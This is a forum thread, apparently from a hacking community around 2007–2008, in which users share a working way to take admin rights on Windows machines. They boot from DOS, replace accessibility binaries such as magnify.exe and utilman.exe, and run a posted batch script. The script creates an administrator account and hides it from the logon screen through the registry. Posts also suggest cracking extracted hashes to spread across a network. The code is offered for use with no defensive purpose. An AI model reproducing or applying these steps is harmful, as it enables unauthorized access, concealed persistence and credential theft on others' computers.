GonZor Posted September 15, 2007 Share Posted September 15, 2007 Ehm, if you try this you'll get some nice errors ;) I'm booting from a dos floppy so I don't have systemvariables If it would be so easy, I would have done this. A problem I spotted is, if someone has more than just 1 windows nt system installed, that the script just copies it once. Hmm I guess I should learn to read properly... :-( Quote Link to comment Share on other sites More sharing options...
Joerg Posted October 10, 2007 Share Posted October 10, 2007 no problem :) I tried my "1337-get-admin-rights-prog" at several computers and i realized a problem: it doesn't work properly if there are more than one installed win nt system o the computer because my program checks out every drive by doing a "if exist" query, so the last drive is the used one. Does anyone know an automated workaround? Quote Link to comment Share on other sites More sharing options...
GonZor Posted October 11, 2007 Share Posted October 11, 2007 no problem :) I tried my "1337-get-admin-rights-prog" at several computers and i realized a problem: it doesn't work properly if there are more than one installed win nt system o the computer because my program checks out every drive by doing a "if exist" query, so the last drive is the used one. Does anyone know an automated workaround? @echo on FOR %i IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO (   IF EXIST %i:ntldr (     SET SYS=%i     FOR %a IN (windows winnt) DO (       IF EXIST %sys%:%asystem32winlogon.exe (         SET WIN=%a         copy ".magnify.exe" "%SYS%:%win%system32dllcachemagnify.exe" /Y         copy ".magnify.exe" "%SYS%:%win%system32magnify.exe" /Y       )     )   ) ) Could try that, You could also rewrite it to make it look better but that should work to copy it over to every existence of windows on every drive. Quote Link to comment Share on other sites More sharing options...
Joerg Posted October 13, 2007 Share Posted October 13, 2007 i didn't tested it yet, but it looks good and i get the idea behind it. But is it possible to get admin rights while the machine is running? Quote Link to comment Share on other sites More sharing options...
The Brain Posted October 14, 2007 Share Posted October 14, 2007 Sure there are some exploits to do so. You may took a look at this. Quote Link to comment Share on other sites More sharing options...
USBHacker Posted October 15, 2007 Share Posted October 15, 2007 Back on that Ultiman thing, it worked for me when I put it on the desktop. I didn't need to put it in my desktop. ttyl USBHacker Quote Link to comment Share on other sites More sharing options...
Joerg Posted October 16, 2007 Share Posted October 16, 2007 It's not really straightforward and only for lager networks (and slightly off topic), but if you can create an admin account (boot cd, floppy, whatever) on one random machine and extract the hashes and crack them, maybe the system administrator has used the same password for some other machines and then you can make a kind of chainreaction: One cracked machine causes another cracked machine. And by that, maybe you can gain a large pool of masterpasswords. I think the use of that pool is clear. Quote Link to comment Share on other sites More sharing options...
USBHacker Posted October 22, 2007 Share Posted October 22, 2007 That magnify code, looked pretty good. How do I use a code like that to replace Notepad2 with notepad? I can do it (and have) but it takes lots of ctrl+v. like maybe a hundred times of pressing ctrl+v. Thanks in advance, USBHacker Quote Link to comment Share on other sites More sharing options...
Joerg Posted October 24, 2007 Share Posted October 24, 2007 Learn to code batch files. Quote Link to comment Share on other sites More sharing options...
USBHacker Posted October 30, 2007 Share Posted October 30, 2007 ^hehehe... good idea... Quote Link to comment Share on other sites More sharing options...
SomeoneE1se Posted October 30, 2007 Share Posted October 30, 2007 ^hehehe... good idea...it's a vary good idea.. go! learn! Quote Link to comment Share on other sites More sharing options...
RainbowColor Posted November 2, 2007 Share Posted November 2, 2007 Hello! How do I use this tool to make a new user? Do I use command prompt? If so, what do I type? And... what is the latest utilman.exe... link plz thx rainbowCOLOR Quote Link to comment Share on other sites More sharing options...
GonZor Posted November 2, 2007 Share Posted November 2, 2007 Hello! How do I use this tool to make a new user? Do I use command prompt? If so, what do I type? And... what is the latest utilman.exe... link plz thx rainbowCOLOR Anyone else find this style of writing similar to a member that recently got banned ? Quote Link to comment Share on other sites More sharing options...
moonlit Posted November 2, 2007 Share Posted November 2, 2007 Anyone else find this style of writing similar to a member that recently got banned ? No, but feel free to report a message to the moderators if you suspect something is out of the ordinary. Quote Link to comment Share on other sites More sharing options...
hyp0dermik Posted November 4, 2007 Share Posted November 4, 2007 Hello! How do I use this tool to make a new user? Do I use command prompt? If so, what do I type? And... what is the latest utilman.exe... link plz thx rainbowCOLOR Anyone else find this style of writing similar to a member that recently got banned ? meaning USBhacker? Quote Link to comment Share on other sites More sharing options...
trustme Posted November 4, 2007 Share Posted November 4, 2007 Who else? Quote Link to comment Share on other sites More sharing options...
SomeoneE1se Posted November 4, 2007 Share Posted November 4, 2007 the problem is he's not smart enough to relies we are not as stupid as he is, so he thinks he's being sneaky but is just being stupid again. Quote Link to comment Share on other sites More sharing options...
sat-jokar Posted November 23, 2007 Share Posted November 23, 2007 I think it was the answer to all these liquefaction here http://home.eunet.no/~pnordahl/ntpasswd/ Quote Link to comment Share on other sites More sharing options...
trustme Posted November 23, 2007 Share Posted November 23, 2007 We have dozens of solutions that involve offline editing, the challenge is to find a way to gain access while logged in as a limited user or guest. Quote Link to comment Share on other sites More sharing options...
felony_destined Posted January 20, 2008 Share Posted January 20, 2008 yeah, I've done a similar hack to this... I noticed that it was already mentioned on the first page, but to replace the screensaver file with cmd.exe and just making the account yourself, theres pros and cons with this in comparison to your 'utilman' method, let see the obvious con of it is definitely the 15minute wait for the screensaver to come on, however... if your not much of a programmer and dont have visual basic, the cmd.exe replacable looks much more attractive =p Quote Link to comment Share on other sites More sharing options...
Skunkfoot Posted January 24, 2008 Share Posted January 24, 2008 First We need to make the program I used Visual Basic 6, here is my source code that i used to create the administrative account: You could just make a batch file to do this, couldn't you? (I guess you'd have to do some sort of bat2exe to convert it though) Quote Link to comment Share on other sites More sharing options...
felony_destined Posted January 24, 2008 Share Posted January 24, 2008 First We need to make the program I used Visual Basic 6, here is my source code that i used to create the administrative account: You could just make a batch file to do this, couldn't you? (I guess you'd have to do some sort of bat2exe to convert it though) yeah... I like that idea better ^.^ Quote Link to comment Share on other sites More sharing options...
Joerg Posted March 18, 2008 Share Posted March 18, 2008 After putting Debian on my pc I sadly didn't had much time for hak.5 and batch projects :( I put FreeDOS on my thumb drive in combination with the utilman or "magnify.exe" and tested it with different computers. I like how easy it works. I post the code once again since I modified it a little bit. net user Accountname Accountpassword /add 2>nul net localgroup Administratoren Accountname /add 2>nul || net localgroup administrators Accountname /add 2>nul net localgroup Benutzer Accountname /delete 2>nul || net localgroup users Accountname /delete 2>nul reg.exe add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v Accountname /t REG_DWORD /d 0 2>nul This code can be compiled via any batch compiler or again modified to be compiled by the Nullsoft Scripable Install System (very dirty I guess). Quote Link to comment Share on other sites More sharing options...
Ferrywell Posted April 4, 2008 Share Posted April 4, 2008 Nifty if this could all be compiled into a small tool and just make an iso for U3 utils :D Then you got the ultimate PnP thumbdrive. Quote Link to comment Share on other sites More sharing options...
nicatronTg Posted April 7, 2008 Share Posted April 7, 2008 Nifty if this could all be compiled into a small tool and just make an iso for U3 utils :D Then you got the ultimate PnP thumbdrive. Pwn 'n Play? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.